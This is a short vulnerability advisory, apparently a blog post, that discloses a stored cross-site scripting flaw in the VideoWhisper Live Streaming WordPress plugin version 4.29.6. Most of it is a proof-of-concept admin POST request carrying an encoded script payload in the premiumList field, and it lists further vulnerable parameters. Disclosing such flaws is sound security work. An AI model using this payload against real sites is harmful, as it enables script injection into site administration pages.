Wednesday 26 February 2014

[EN] XSS in VideoWhisper Live Streaming

# ==============================================================
# Title ...| XSS in VideoWhisper Live Streaming
# Version .| 4.29.6
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=premium HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 310

premiumList='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&canWatchPremium=all&watchListPremium=Super+Admin%2C+Administrator%2C+Editor%2C+Author%2C+Contributor%2C+Subscriber&pLogo=1&transcoding=1&alwaysRTMP=0&pBroadcastTime=0&pWatchTime=0&timeReset=30&pCamBandwidth=65536&pCamMaxBandwidth=163840&submit=Save+Changes
---<request>---

Also vulnerable: watchListPremium, pBroadcastTime, timeReset, pCamBandwidth


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a Comment

What do You think...?